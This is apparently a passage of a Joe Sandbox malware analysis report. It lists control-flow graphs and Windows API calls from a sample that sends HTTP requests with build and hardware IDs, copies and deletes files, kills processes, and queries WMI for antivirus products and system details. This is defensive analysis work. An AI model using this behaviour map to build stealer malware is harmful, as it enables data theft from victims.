                                              control_flow_graph 2081 403af5-403bc4 _EH_prolog call 410742 call 403a54 call 41070b * 5 call 410935 InternetOpenA StrCmpCA 2098 403bc6 2081->2098 2099 403bc8-403bcb 2081->2099 2098->2099 2100 403bd1-403d4f call 411944 call 410810 call 4107c9 call 410776 * 2 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410810 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 410810 call 4107c9 call 410776 * 2 InternetConnectA 2099->2100 2101 404122-4041b1 InternetCloseHandle call 41187c * 2 call 410776 * 8 2099->2101 2100->2101 2172 403d55-403d88 HttpOpenRequestA 2100->2172 2173 404119-40411c InternetCloseHandle 2172->2173 2174 403d8e-403d90 2172->2174 2173->2101 2175 403d92-403da2 InternetSetOptionA 2174->2175 2176 403da8-4040b3 call 410884 call 4107c9 call 410776 call 410810 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410810 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410810 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410810 call 4107c9 call 410776 call 41070b call 410810 * 2 call 4107c9 call 410776 * 2 call 410935 lstrlenA call 410935 * 2 lstrlenA call 410935 HttpSendRequestA 2174->2176 2175->2176 2287 4040ef-404104 InternetReadFile 2176->2287 2288 4040b5-4040ba 2287->2288 2289 404106-404114 InternetCloseHandle call 410776 2287->2289 2288->2289 2290 4040bc-4040ea call 410884 call 4107c9 call 410776 2288->2290 2289->2173 2290->2287
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00403AFA
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
                                              • StrCmpCA.SHLWAPI(?), ref: 00403BBC
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00403D44
                                              • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00403D7E
                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00403DA2
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                              • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00426975,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 0040407E
                                              • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404097
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004040A8
                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004040FC
                                              • InternetCloseHandle.WININET(00000000), ref: 00404107
                                              • InternetCloseHandle.WININET(?), ref: 0040411C
                                              • InternetCloseHandle.WININET(?), ref: 00404125
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$lstrcpy$H_prologlstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                              • String ID: !$"$"$------$------$------$build_id$hwid
                                              • API String ID: 1139859944-3346224549
                                              • Opcode ID: 30aaebd992676f2aa7ae6a6ee7e314caf3af7754b72d1f0f0f4156a8737da334
                                              • Instruction ID: 3f4b6d901fb2b8f95c9e3afc9557af72407c732f8d0fec62a55eb0a88ba48245
                                              • Opcode Fuzzy Hash: 30aaebd992676f2aa7ae6a6ee7e314caf3af7754b72d1f0f0f4156a8737da334
                                              • Instruction Fuzzy Hash: 41224571801149EEDB05EBE5C955AEEBBB8AF19308F10419EF50173182DFB82BC8DB65

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2297 407277-4072a0 _EH_prolog call 410910 2300 4072a2-4072aa 2297->2300 2301 4072ac-4072bf call 410910 2297->2301 2302 4072ca call 41077f 2300->2302 2307 4072c5 2301->2307 2308 407387-407394 call 410910 2301->2308 2306 4072cf-407385 call 41070b call 411944 call 410884 call 410810 call 410884 call 410810 call 4107c9 call 410776 * 5 2302->2306 2345 4073d4-4073f0 call 410935 * 2 CopyFileA 2306->2345 2307->2302 2308->2306 2314 40739a-4073b6 call 410776 * 2 2308->2314 2323 407948-407969 call 410776 call 401061 2314->2323 2350 4073f2-40741d call 41070b call 410884 2345->2350 2351 4073bb-4073d1 call 410742 call 411e3e 2345->2351 2360 407423-4074b1 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410810 call 4107c9 call 410776 call 410884 call 4107c9 2350->2360 2361 4074b6-40758a call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410810 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410810 call 410884 call 4107c9 call 410776 2350->2361 2351->2345 2402 40758d-4075ad call 410776 call 410935 2360->2402 2361->2402 2416 4075b3-4075ce 2402->2416 2417 4078f6-407908 call 410935 DeleteFileA call 4108fc 2402->2417 2423 4078e2-4078f5 2416->2423 2424 4075d4-4075ea GetProcessHeap RtlAllocateHeap 2416->2424 2427 40790d-407945 call 4108fc call 410776 * 4 2417->2427 2423->2417 2426 40785e-40786b 2424->2426 2432 407871-40787d lstrlenA 2426->2432 2433 4075ef-40769c call 41070b * 6 call 410910 2426->2433 2427->2323 2436 4078d3-4078df memset 2432->2436 2437 40787f-4078bd lstrlenA call 410742 call 4010b1 call 415865 2432->2437 2472 4076a6 2433->2472 2473 40769e-4076a4 2433->2473 2436->2423 2453 4078c2-4078ce call 410776 2437->2453 2453->2436 2474 4076ac-4076c3 call 41077f call 410910 2472->2474 2473->2474 2479 4076c5-4076cb 2474->2479 2480 4076cd 2474->2480 2481 4076d3-4076e4 call 41077f call 410929 2479->2481 2480->2481 2486 4076f3-407859 call 410935 lstrcat * 2 call 410935 lstrcat * 2 call 410935 lstrcat * 2 call 410935 lstrcat * 2 call 410935 lstrcat * 2 call 410935 lstrcat * 2 call 406ef1 call 410935 lstrcat call 410776 lstrcat call 410776 * 6 2481->2486 2487 4076e6-4076ee call 41077f 2481->2487 2486->2426 2487->2486
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 0040727C
                                                • Part of subcall function 00410910: StrCmpCA.SHLWAPI(?,?,?,004096DF,00426E2C,00000000), ref: 00410919
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00426C24,?,?,?,00426BFA,?,00000000), ref: 004073E8
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 00411E3E: _EH_prolog.MSVCRT ref: 00411E43
                                                • Part of subcall function 00411E3E: memset.MSVCRT ref: 00411E65
                                                • Part of subcall function 00411E3E: OpenProcess.KERNEL32(00001001,00000000,?,?,?), ref: 00411EEC
                                                • Part of subcall function 00411E3E: TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 00411EFA
                                                • Part of subcall function 00411E3E: CloseHandle.KERNEL32(00000000,?,?), ref: 00411F01
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004075DA
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 004075E1
                                              • lstrcat.KERNEL32(00000000,00000000), ref: 004076FF
                                              • lstrcat.KERNEL32(00000000,00426C40), ref: 0040770D
                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0040771F
                                              • lstrcat.KERNEL32(00000000,00426C44), ref: 0040772D
                                              • lstrlenA.KERNEL32(00000000), ref: 00407874
                                              • lstrlenA.KERNEL32(00000000), ref: 00407882
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
                                                • Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
                                                • Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918
                                              • memset.MSVCRT ref: 004078DA
                                              • DeleteFileA.KERNEL32(00000000), ref: 004078FF
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prologlstrcat$lstrcpy$Processlstrlen$FileHeapmemset$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait
                                              • String ID:
                                              • API String ID: 4187064601-0
                                              • Opcode ID: 420e07143e74f736176b56749dc803c39542110a5146e416bbc9cfe120abf6a2
                                              • Instruction ID: 6e70194592704a8138ca5a8de9c4287eeae0ad470012b057b61369f79f447507
                                              • Opcode Fuzzy Hash: 420e07143e74f736176b56749dc803c39542110a5146e416bbc9cfe120abf6a2
                                              • Instruction Fuzzy Hash: B522CF31804149EEDF05EBE5DD5AAEEBB75AF15308F10405EF401721D2EFB82A88DB66

                                              Control-flow Graph

                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00411569
                                              • CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,0042779C,00000000,?,Work Dir: In memory,00000000), ref: 00411581
                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 00411592
                                              • CoCreateInstance.OLE32(004280EC,00000000,00000001,0042801C,?,?,00000000,?,?,?,?,?,?,0042779C,00000000,?), ref: 004115AC
                                              • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004115E2
                                              • VariantInit.OLEAUT32(?), ref: 0041163D
                                                • Part of subcall function 004114AC: _EH_prolog.MSVCRT ref: 004114B1
                                                • Part of subcall function 004114AC: CoCreateInstance.OLE32(00427E9C,00000000,00000001,004274E0,?,00000001,00000000,00000000,00000001,?,00000000), ref: 004114D8
                                                • Part of subcall function 004114AC: SysAllocString.OLEAUT32(?), ref: 004114E5
                                                • Part of subcall function 004114AC: _wtoi64.MSVCRT ref: 00411520
                                                • Part of subcall function 004114AC: SysFreeString.OLEAUT32(?), ref: 00411533
                                                • Part of subcall function 004114AC: SysFreeString.OLEAUT32(00000000), ref: 0041153A
                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,0042779C,00000000,?,Work Dir: In memory,00000000), ref: 00411675
                                              • GetProcessHeap.KERNEL32(?,?,00000000,?,?,?,?,?,?,0042779C,00000000,?,Work Dir: In memory,00000000,?,00427784), ref: 0041167B
                                              • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,00000000,?,?,?,?,?,?,0042779C,00000000,?,Work Dir: In memory), ref: 00411688
                                              • VariantClear.OLEAUT32(?), ref: 004116CA
                                              • wsprintfA.USER32 ref: 004116B4
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: String$AllocCreateFreeH_prologHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                              • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                              • API String ID: 2456697202-461178377
                                              • Opcode ID: e755b06c74eda406b13eb378eb6dd6d5d0cd1527c1b6474a9e65b12fdc8d7d05
                                              • Instruction ID: ae9411e671be8cb23ed68c5842b0e9f412c6a2781a55fc7e069c055b93801e12
                                              • Opcode Fuzzy Hash: e755b06c74eda406b13eb378eb6dd6d5d0cd1527c1b6474a9e65b12fdc8d7d05
                                              • Instruction Fuzzy Hash: DB517C71A01228BBCB20DF95DC49EEFBFBCEF09B11F504106F611A6190C7799A41CBA8

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2539 404f2a-404fae _EH_prolog call 410742 call 403a54 call 41070b call 410935 InternetOpenA StrCmpCA 2548 404fb0 2539->2548 2549 404fb1-404fb4 2539->2549 2548->2549 2550 4050f5-4050fc call 410742 2549->2550 2551 404fba-404fd4 InternetConnectA 2549->2551 2557 405101-40513c call 410776 * 3 2550->2557 2552 404fda-405009 HttpOpenRequestA 2551->2552 2553 4050ec-4050ef InternetCloseHandle 2551->2553 2555 4050e3-4050e6 InternetCloseHandle 2552->2555 2556 40500f-405011 2552->2556 2553->2550 2555->2553 2559 405013-405023 InternetSetOptionA 2556->2559 2560 405029-405054 HttpSendRequestA HttpQueryInfoA 2556->2560 2559->2560 2562 405056-405063 call 41070b 2560->2562 2563 405068-40507a call 41185f 2560->2563 2562->2557 2570 405080-405082 2563->2570 2571 40513d-40514a call 41070b 2563->2571 2573 405084-405089 2570->2573 2574 4050dc-4050dd InternetCloseHandle 2570->2574 2571->2557 2577 4050c5-4050da InternetReadFile 2573->2577 2574->2555 2577->2574 2579 40508b-405090 2577->2579 2579->2574 2580 405092-4050c0 call 410884 call 4107c9 call 410776 2579->2580 2580->2577
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00404F2F
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                              • StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                              • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                              • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004050D2
                                              • InternetCloseHandle.WININET(00000000), ref: 004050DD
                                              • InternetCloseHandle.WININET(?), ref: 004050E6
                                              • InternetCloseHandle.WININET(?), ref: 004050EF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleHttp$H_prologOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                              • String ID: ERROR$ERROR$GET
                                              • API String ID: 2435781452-2509457195
                                              • Opcode ID: 1a92ccbac519f21515b010ee829a9c90af2a3be3ea6a7272d9bca599a976676f
                                              • Instruction ID: d1f17326ea2cf28898f048348349d2df5afab327e1f2dbb02098ea821e195baf
                                              • Opcode Fuzzy Hash: 1a92ccbac519f21515b010ee829a9c90af2a3be3ea6a7272d9bca599a976676f
                                              • Instruction Fuzzy Hash: 1B516D71900119AFEB11DFA0DC85EFFBBBDEB05344F10402AF601A6191DB795E84CBA5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2623 41170d-411778 _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 2625 411845-41184a 2623->2625 2626 41177e-4117aa CoSetProxyBlanket 2623->2626 2627 411824-411827 call 41070b 2625->2627 2629 4117ae-4117b0 2626->2629 2630 41182c-41183d 2627->2630 2631 4117b6-4117c1 2629->2631 2632 41183e-411843 2629->2632 2633 4117c3-4117d8 2631->2633 2634 41181b-41181f 2631->2634 2632->2627 2633->2634 2636 4117da-411819 VariantInit call 411a75 call 41070b VariantClear 2633->2636 2634->2627 2636->2630
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00411712
                                              • CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,0042779C,00000000,?,Work Dir: In memory,00000000,?,00427784,00000000,?,00000000), ref: 0041172A
                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,0042779C,00000000,?,Work Dir: In memory,00000000), ref: 0041173B
                                              • CoCreateInstance.OLE32(004280EC,00000000,00000001,0042801C,?,?,00000000,0042779C,00000000,?,Work Dir: In memory,00000000,?,00427784,00000000,?), ref: 00411755
                                              • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,0042779C,00000000,?,Work Dir: In memory,00000000,?), ref: 0041178B
                                              • VariantInit.OLEAUT32(?), ref: 004117DE
                                                • Part of subcall function 00411A75: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,00411805,?,?,00000000,0042779C,00000000,?,Work Dir: In memory,00000000,?,00427784,00000000), ref: 00411A7D
                                                • Part of subcall function 00411A75: CharToOemW.USER32(?,00000000), ref: 00411A89
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                              • VariantClear.OLEAUT32(?), ref: 00411813
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prologInitInstanceLocalProxySecuritylstrcpy
                                              • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                              • API String ID: 3694693100-315474579
                                              • Opcode ID: bdccf08652369387e42b06f21db0e1d9143e0328e5483ada23e33f9ea037bb3e
                                              • Instruction ID: cdbe02839844cbb281c6cbe25b28e4a03c3700f38dd34abeedc1445e8ae81cff
                                              • Opcode Fuzzy Hash: bdccf08652369387e42b06f21db0e1d9143e0328e5483ada23e33f9ea037bb3e
                                              • Instruction Fuzzy Hash: F1414C71A01229BBCB10EF95DC49EEF7F78EF49B21F60810AF115A6190C7785A41CBA8
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00410E5E
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                              • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0042731F,00000001,00000000), ref: 00410EA6
                                              • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410EF0
                                              • wsprintfA.USER32 ref: 00410F1A
                                              • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410F37
                                              • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410F61
                                              • lstrlenA.KERNEL32(?), ref: 00410F76
                                              • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00427348), ref: 00410FF6
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: OpenQueryValuelstrcpy$EnumH_prologlstrlenwsprintf
                                              • String ID: - $%s\%s$?
                                              • API String ID: 404191982-3278919252
                                              • Opcode ID: 42eb76426bad67a141e30503dc5f21c1f1b9ccbcfb3092c8fdf965fc4b4971f1
                                              • Instruction ID: 939cb2b353aebe516f98e05683f7fa7186676c94004d9447f4d5b867d2a871e3
                                              • Opcode Fuzzy Hash: 42eb76426bad67a141e30503dc5f21c1f1b9ccbcfb3092c8fdf965fc4b4971f1
                                              • Instruction Fuzzy Hash: 4A71367180025DEEDF11EFA1CD84AEEBBBDBF19304F00005AE506B2151EB785A88CB65
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 004112CA
                                              • GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 004112ED
                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0041131F
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00411362
                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00411369
                                              • wsprintfA.USER32 ref: 00411395
                                              • lstrcat.KERNEL32(00000000,004272F8), ref: 004113A4
